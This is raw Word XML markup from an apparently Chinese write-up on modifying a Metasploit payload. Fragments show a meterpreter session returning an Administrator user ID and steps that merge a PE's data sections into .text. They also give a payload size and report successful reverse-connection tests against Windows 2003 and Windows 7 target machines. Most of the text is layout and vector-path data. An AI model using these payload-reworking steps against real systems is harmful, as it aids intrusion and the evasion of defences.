          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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meterpreter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996c38"/>
          <w:spacing w:val="10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getuid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8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="11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Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="12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username:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="13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WIN03X64\Administrator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="8272" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12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10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="214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1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第二次优化p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ayload：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载入P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EID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5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-9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>合并data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>text，rdata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在次生成。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69.599pt;width:467.400pt;height:86.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId30" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:216.600pt;width:336.600pt;height:295.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId31" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:572.400pt;width:259.800pt;height:63.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId32" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:696.600pt;width:467.400pt;height:94.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId33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65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S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ection变化如下：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95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6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ayload大小如下：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4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096字节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52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3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第二次靶机测试：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分别测试Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> 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2003，Windws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="7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7，reverse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> 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OK。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group style="position:absolute;margin-left:519.500pt;margin-top:70.500pt;width:0.500pt;height:213.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,1410" coordsize="10,4270">
        <v:shape style="position:absolute;left:10390;top:1410;width:10;height:4270" coordorigin="10390,1410" coordsize="10,4270" path="m10402,1420l10402,1420,10402,1420,10402,1420,10402,1420,10402,1420,10402,1420,10402,1420,10402,1421,10402,1421,10402,1422,10402,1422,10402,1423,10402,1424,10402,1425,10402,1427,10402,1428,10402,1430,10402,1432,10402,1434,10402,1437,10402,1440,10402,1443,10402,1447,10402,1450,10402,1455,10402,1459,10402,1464,10402,1469,10402,1475,10402,1481,10402,1488,10402,1495,10402,1503,10402,1511,10402,1519,10402,1528,10402,1538,10402,1548,10402,1558,10402,1570,10402,1582,10402,1594,10402,1607,10402,1621,10402,1635,10402,1650,10402,1666,10402,1682,10402,1699,10402,1717,10402,1736,10402,1755,10402,1775,10402,1796,10402,1818,10402,1841,10402,1864,10402,1888,10402,1913,10402,1939,10402,1966,10402,1994,10402,2022,10402,2052,10402,2083,10402,2114,10402,2147,10402,2180,10402,2215,10402,2251,10402,2287,10402,2325,10402,2364,10402,2404,10402,2445,10402,2487,10402,2530,10402,2574,10402,2620,10402,2667,10402,2715,10402,2764,10402,2814,10402,2866,10402,2919,10402,2973,10402,3028,10402,3085,10402,3143,10402,3203,10402,3264,10402,3326,10402,3389,10402,3454,10402,3520,10402,3588,10402,3657,10402,3728,10402,3800,10402,3874,10402,3949,10402,4026,10402,4104,10402,4183,10402,4265,10402,4348,10402,4432,10402,4518,10402,4606,10402,4695,10402,4786,10402,4879,10402,4973,10402,5069,10402,5167,10402,5266,10402,5368,10402,5471,10402,5575,10402,5682e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:70.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1410" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1410;width:8990;height:390" coordorigin="1490,1410" coordsize="8990,390" path="m1510,1420l1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1511,1420,1512,1420,1512,1420,1514,1420,1515,1420,1517,1420,1519,1420,1521,1420,1524,1420,1528,1420,1532,1420,1536,1420,1541,1420,1546,1420,1552,1420,1559,1420,1566,1420,1575,1420,1583,1420,1593,1420,1603,1420,1615,1420,1627,1420,1640,1420,1654,1420,1668,1420,1684,1420,1701,1420,1719,1420,1738,1420,1758,1420,1780,1420,1802,1420,1826,1420,1851,1420,1877,1420,1904,1420,1933,1420,1963,1420,1995,1420,2028,1420,2063,1420,2099,1420,2136,1420,2175,1420,2216,1420,2259,1420,2303,1420,2348,1420,2396,1420,2445,1420,2496,1420,2549,1420,2604,1420,2660,1420,2719,1420,2779,1420,2841,1420,2906,1420,2972,1420,3041,1420,3112,1420,3184,1420,3259,1420,3336,1420,3416,1420,3498,1420,3582,1420,3668,1420,3757,1420,3848,1420,3941,1420,4037,1420,4136,1420,4236,1420,4340,1420,4446,1420,4555,1420,4666,1420,4780,1420,4897,1420,5017,1420,5139,1420,5264,1420,5392,1420,5523,1420,5657,1420,5793,1420,5933,1420,6076,1420,6222,1420,6370,1420,6522,1420,6677,1420,6835,1420,6997,1420,7161,1420,7329,1420,7500,1420,7675,1420,7853,1420,8034,1420,8219,1420,8407,1420,8598,1420,8793,1420,8992,1420,9194,1420,9400,1420,9609,1420,9823,1420,10039,1420,10260,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1421,10484,1421,10484,1421,10484,1421,10484,1422,10484,1422,10484,1422,10484,1423,10484,1423,10484,1423,10484,1424,10484,1424,10484,1425,10484,1425,10484,1426,10484,1427,10484,1427,10484,1428,10484,1429,10484,1430,10484,1431,10484,1431,10484,1432,10484,1433,10484,1435,10484,1436,10484,1437,10484,1438,10484,1439,10484,1441,10484,1442,10484,1444,10484,1445,10484,1447,10484,1449,10484,1450,10484,1452,10484,1454,10484,1456,10484,1458,10484,1460,10484,1463,10484,1465,10484,1467,10484,1470,10484,1472,10484,1475,10484,1478,10484,1480,10484,1483,10484,1486,10484,1489,10484,1493,10484,1496,10484,1499,10484,1503,10484,1506,10484,1510,10484,1514,10484,1517,10484,1521,10484,1525,10484,1530,10484,1534,10484,1538,10484,1543,10484,1547,10484,1552,10484,1557,10484,1562,10484,1567,10484,1572,10484,1578,10484,1583,10484,1589,10484,1594,10484,1600,10484,1606,10484,1612,10484,1618,10484,1625,10484,1631,10484,1638,10484,1644,10484,1651,10484,1658,10484,1665,10484,1673,10484,1680,10484,1688,10484,1695,10484,1703,10484,1711,10484,1720,10484,1728,10484,1736,10484,1745,10484,1754,10484,1763,10484,1772,10484,1781,10484,1791,10484,1800,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10483,1810,10482,1810,10482,1810,10480,1810,10479,1810,10477,1810,10475,1810,10473,1810,10470,1810,10466,1810,10462,1810,10458,1810,10453,1810,10448,1810,10442,1810,10435,1810,10428,1810,10419,1810,10411,1810,10401,1810,10391,1810,10379,1810,10367,1810,10354,1810,10340,1810,10326,1810,10310,1810,10293,1810,10275,1810,10256,1810,10236,1810,10215,1810,10192,1810,10168,1810,10143,1810,10117,1810,10090,1810,10061,1810,10031,1810,9999,1810,9966,1810,9931,1810,9895,1810,9858,1810,9819,1810,9778,1810,9735,1810,9691,1810,9646,1810,9598,1810,9549,1810,9498,1810,9445,1810,9391,1810,9334,1810,9275,1810,9215,1810,9153,1810,9088,1810,9022,1810,8953,1810,8883,1810,8810,1810,8735,1810,8658,1810,8578,1810,8497,1810,8413,1810,8326,1810,8238,1810,8146,1810,8053,1810,7957,1810,7859,1810,7758,1810,7654,1810,7548,1810,7439,1810,7328,1810,7214,1810,7097,1810,6977,1810,6855,1810,6730,1810,6602,1810,6471,1810,6337,1810,6201,1810,6061,1810,5918,1810,5773,1810,5624,1810,5472,1810,5317,1810,5159,1810,4997,1810,4833,1810,4665,1810,4494,1810,4319,1810,4141,1810,3960,1810,3776,1810,3587,1810,3396,1810,3201,1810,3002,1810,2800,1810,2594,1810,2385,1810,2172,1810,1955,1810,1734,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1809,1510,1809,1510,1809,1510,1809,1510,1809,1510,1809,1510,1808,1510,1808,1510,1808,1510,1807,1510,1807,1510,1807,1510,1806,1510,1806,1510,1805,1510,1805,1510,1804,1510,1804,1510,1803,1510,1802,1510,1802,1510,1801,1510,1800,1510,1799,1510,1798,1510,1797,1510,1796,1510,1795,1510,1794,1510,1793,1510,1791,1510,1790,1510,1789,1510,1787,1510,1786,1510,1784,1510,1783,1510,1781,1510,1779,1510,1777,1510,1775,1510,1773,1510,1771,1510,1769,1510,1767,1510,1765,1510,1762,1510,1760,1510,1757,1510,1755,1510,1752,1510,1749,1510,1746,1510,1743,1510,1740,1510,1737,1510,1734,1510,1730,1510,1727,1510,1723,1510,1720,1510,1716,1510,1712,1510,1708,1510,1704,1510,1700,1510,1696,1510,1691,1510,1687,1510,1682,1510,1678,1510,1673,1510,1668,1510,1663,1510,1657,1510,1652,1510,1647,1510,1641,1510,1635,1510,1630,1510,1624,1510,1618,1510,1611,1510,1605,1510,1599,1510,1592,1510,1585,1510,1578,1510,1571,1510,1564,1510,1557,1510,1549,1510,1542,1510,1534,1510,1526,1510,1518,1510,1510,1510,1502,1510,1493,1510,1485,1510,1476,1510,1467,1510,1458,1510,1448,1510,1439,1510,1429,1510,1420e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:69.599pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId34" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:89.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1790" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:1790;width:8990;height:350" coordorigin="1490,1790" coordsize="8990,350" path="m1510,1810l1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1511,1810,1512,1810,1512,1810,1514,1810,1515,1810,1517,1810,1519,1810,1521,1810,1524,1810,1528,1810,1532,1810,1536,1810,1541,1810,1546,1810,1552,1810,1559,1810,1566,1810,1575,1810,1583,1810,1593,1810,1603,1810,1615,1810,1627,1810,1640,1810,1654,1810,1668,1810,1684,1810,1701,1810,1719,1810,1738,1810,1758,1810,1780,1810,1802,1810,1826,1810,1851,1810,1877,1810,1904,1810,1933,1810,1963,1810,1995,1810,2028,1810,2063,1810,2099,1810,2136,1810,2175,1810,2216,1810,2259,1810,2303,1810,2348,1810,2396,1810,2445,1810,2496,1810,2549,1810,2604,1810,2660,1810,2719,1810,2779,1810,2841,1810,2906,1810,2972,1810,3041,1810,3112,1810,3184,1810,3259,1810,3336,1810,3416,1810,3498,1810,3582,1810,3668,1810,3757,1810,3848,1810,3941,1810,4037,1810,4136,1810,4236,1810,4340,1810,4446,1810,4555,1810,4666,1810,4780,1810,4897,1810,5017,1810,5139,1810,5264,1810,5392,1810,5523,1810,5657,1810,5793,1810,5933,1810,6076,1810,6222,1810,6370,1810,6522,1810,6677,1810,6835,1810,6997,1810,7161,1810,7329,1810,7500,1810,7675,1810,7853,1810,8034,1810,8219,1810,8407,1810,8598,1810,8793,1810,8992,1810,9194,1810,9400,1810,9609,1810,9823,1810,10039,1810,10260,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1811,10484,1811,10484,1811,10484,1811,10484,1811,10484,1811,10484,1812,10484,1812,10484,1812,10484,1813,10484,1813,10484,1813,10484,1814,10484,1814,10484,1815,10484,1815,10484,1816,10484,1816,10484,1817,10484,1818,10484,1818,10484,1819,10484,1820,10484,1821,10484,1822,10484,1822,10484,1823,10484,1824,10484,1825,10484,1827,10484,1828,10484,1829,10484,1830,10484,1832,10484,1833,10484,1834,10484,1836,10484,1837,10484,1839,10484,1841,10484,1843,10484,1844,10484,1846,10484,1848,10484,1850,10484,1852,10484,1854,10484,1857,10484,1859,10484,1861,10484,1864,10484,1866,10484,1869,10484,1872,10484,1874,10484,1877,10484,1880,10484,1883,10484,1886,10484,1889,10484,1893,10484,1896,10484,1899,10484,1903,10484,1907,10484,1910,10484,1914,10484,1918,10484,1922,10484,1926,10484,1930,10484,1935,10484,1939,10484,1943,10484,1948,10484,1953,10484,1958,10484,1962,10484,1967,10484,1973,10484,1978,10484,1983,10484,1989,10484,1994,10484,2000,10484,2006,10484,2012,10484,2018,10484,2024,10484,2030,10484,2037,10484,2043,10484,2050,10484,2057,10484,2064,10484,2071,10484,2078,10484,2085,10484,2093,10484,2100,10484,2108,10484,2116,10484,2124,10484,2132,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10483,2140,10482,2140,10482,2140,10480,2140,10479,2140,10477,2140,10475,2140,10473,2140,10470,2140,10466,2140,10462,2140,10458,2140,10453,2140,10448,2140,10442,2140,10435,2140,10428,2140,10419,2140,10411,2140,10401,2140,10391,2140,10379,2140,10367,2140,10354,2140,10340,2140,10326,2140,10310,2140,10293,2140,10275,2140,10256,2140,10236,2140,10215,2140,10192,2140,10168,2140,10143,2140,10117,2140,10090,2140,10061,2140,10031,2140,9999,2140,9966,2140,9931,2140,9895,2140,9858,2140,9819,2140,9778,2140,9735,2140,9691,2140,9646,2140,9598,2140,9549,2140,9498,2140,9445,2140,9391,2140,9334,2140,9275,2140,9215,2140,9153,2140,9088,2140,9022,2140,8953,2140,8883,2140,8810,2140,8735,2140,8658,2140,8578,2140,8497,2140,8413,2140,8326,2140,8238,2140,8146,2140,8053,2140,7957,2140,7859,2140,7758,2140,7654,2140,7548,2140,7439,2140,7328,2140,7214,2140,7097,2140,6977,2140,6855,2140,6730,2140,6602,2140,6471,2140,6337,2140,6201,2140,6061,2140,5918,2140,5773,2140,5624,2140,5472,2140,5317,2140,5159,2140,4997,2140,4833,2140,4665,2140,4494,2140,4319,2140,4141,2140,3960,2140,3776,2140,3587,2140,3396,2140,3201,2140,3002,2140,2800,2140,2594,2140,2385,2140,2172,2140,1955,2140,1734,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2139,1510,2139,1510,2139,1510,2139,1510,2139,1510,2139,1510,2138,1510,2138,1510,2138,1510,2137,1510,2137,1510,2137,1510,2136,1510,2136,1510,2135,1510,2135,1510,2134,1510,2134,1510,2133,1510,2132,1510,2132,1510,2131,1510,2130,1510,2129,1510,2128,1510,2128,1510,2127,1510,2126,1510,2124,1510,2123,1510,2122,1510,2121,1510,2120,1510,2118,1510,2117,1510,2116,1510,2114,1510,2113,1510,2111,1510,2109,1510,2107,1510,2106,1510,2104,1510,2102,1510,2100,1510,2098,1510,2096,1510,2093,1510,2091,1510,2089,1510,2086,1510,2084,1510,2081,1510,2078,1510,2076,1510,2073,1510,2070,1510,2067,1510,2064,1510,2061,1510,2057,1510,2054,1510,2051,1510,2047,1510,2043,1510,2040,1510,2036,1510,2032,1510,2028,1510,2024,1510,2020,1510,2015,1510,2011,1510,2007,1510,2002,1510,1997,1510,1992,1510,1988,1510,1982,1510,1977,1510,1972,1510,1967,1510,1961,1510,1956,1510,1950,1510,1944,1510,1938,1510,1932,1510,1926,1510,1920,1510,1913,1510,1907,1510,1900,1510,1893,1510,1886,1510,1879,1510,1872,1510,1865,1510,1857,1510,1850,1510,1842,1510,1834,1510,1826,1510,1818,1510,1810e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:89.500pt;width:1.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1790" coordsize="30,350">
        <v:shape style="position:absolute;left:1490;top:1790;width:30;height:350" coordorigin="1490,1790" coordsize="30,350" path="m1517,1810l1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1811,1517,1811,1517,1811,1517,1811,1517,1811,1517,1811,1517,1812,1517,1812,1517,1812,1517,1813,1517,1813,1517,1813,1517,1814,1517,1814,1517,1815,1517,1815,1517,1816,1517,1816,1517,1817,1517,1818,1517,1818,1517,1819,1517,1820,1517,1821,1517,1822,1517,1822,1517,1823,1517,1824,1517,1825,1517,1827,1517,1828,1517,1829,1517,1830,1517,1832,1517,1833,1517,1834,1517,1836,1517,1837,1517,1839,1517,1841,1517,1843,1517,1844,1517,1846,1517,1848,1517,1850,1517,1852,1517,1854,1517,1857,1517,1859,1517,1861,1517,1864,1517,1866,1517,1869,1517,1872,1517,1874,1517,1877,1517,1880,1517,1883,1517,1886,1517,1889,1517,1893,1517,1896,1517,1899,1517,1903,1517,1907,1517,1910,1517,1914,1517,1918,1517,1922,1517,1926,1517,1930,1517,1935,1517,1939,1517,1943,1517,1948,1517,1953,1517,1958,1517,1962,1517,1967,1517,1973,1517,1978,1517,1983,1517,1989,1517,1994,1517,2000,1517,2006,1517,2012,1517,2018,1517,2024,1517,2030,1517,2037,1517,2043,1517,2050,1517,2057,1517,2064,1517,2071,1517,2078,1517,2085,1517,2093,1517,2100,1517,2108,1517,2116,1517,2124,1517,2132,1517,2140e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:106.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2130" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:2130;width:8990;height:370" coordorigin="1490,2130" coordsize="8990,370" path="m1510,2140l1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1511,2140,1512,2140,1512,2140,1514,2140,1515,2140,1517,2140,1519,2140,1521,2140,1524,2140,1528,2140,1532,2140,1536,2140,1541,2140,1546,2140,1552,2140,1559,2140,1566,2140,1575,2140,1583,2140,1593,2140,1603,2140,1615,2140,1627,2140,1640,2140,1654,2140,1668,2140,1684,2140,1701,2140,1719,2140,1738,2140,1758,2140,1780,2140,1802,2140,1826,2140,1851,2140,1877,2140,1904,2140,1933,2140,1963,2140,1995,2140,2028,2140,2063,2140,2099,2140,2136,2140,2175,2140,2216,2140,2259,2140,2303,2140,2348,2140,2396,2140,2445,2140,2496,2140,2549,2140,2604,2140,2660,2140,2719,2140,2779,2140,2841,2140,2906,2140,2972,2140,3041,2140,3112,2140,3184,2140,3259,2140,3336,2140,3416,2140,3498,2140,3582,2140,3668,2140,3757,2140,3848,2140,3941,2140,4037,2140,4136,2140,4236,2140,4340,2140,4446,2140,4555,2140,4666,2140,4780,2140,4897,2140,5017,2140,5139,2140,5264,2140,5392,2140,5523,2140,5657,2140,5793,2140,5933,2140,6076,2140,6222,2140,6370,2140,6522,2140,6677,2140,6835,2140,6997,2140,7161,2140,7329,2140,7500,2140,7675,2140,7853,2140,8034,2140,8219,2140,8407,2140,8598,2140,8793,2140,8992,2140,9194,2140,9400,2140,9609,2140,9823,2140,10039,2140,10260,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2141,10484,2141,10484,2141,10484,2141,10484,2141,10484,2141,10484,2142,10484,2142,10484,2142,10484,2142,10484,2143,10484,2143,10484,2144,10484,2144,10484,2144,10484,2145,10484,2146,10484,2146,10484,2147,10484,2147,10484,2148,10484,2149,10484,2150,10484,2150,10484,2151,10484,2152,10484,2153,10484,2154,10484,2155,10484,2157,10484,2158,10484,2159,10484,2160,10484,2162,10484,2163,10484,2165,10484,2166,10484,2168,10484,2170,10484,2171,10484,2173,10484,2175,10484,2177,10484,2179,10484,2181,10484,2184,10484,2186,10484,2188,10484,2191,10484,2193,10484,2196,10484,2198,10484,2201,10484,2204,10484,2207,10484,2210,10484,2213,10484,2216,10484,2220,10484,2223,10484,2227,10484,2230,10484,2234,10484,2238,10484,2242,10484,2246,10484,2250,10484,2254,10484,2258,10484,2263,10484,2267,10484,2272,10484,2277,10484,2282,10484,2287,10484,2292,10484,2297,10484,2302,10484,2308,10484,2313,10484,2319,10484,2325,10484,2331,10484,2337,10484,2343,10484,2350,10484,2356,10484,2363,10484,2369,10484,2376,10484,2383,10484,2391,10484,2398,10484,2405,10484,2413,10484,2421,10484,2428,10484,2436,10484,2445,10484,2453,10484,2461,10484,2470,10484,2479,10484,2488,10484,2497,10484,2506,10484,2515,10484,2515,10484,2515,10484,2515,10484,2515,10484,2515,10484,2515,10483,2515,10482,2515,10482,2515,10480,2515,10479,2515,10477,2515,10475,2515,10473,2515,10470,2515,10466,2515,10462,2515,10458,2515,10453,2515,10448,2515,10442,2515,10435,2515,10428,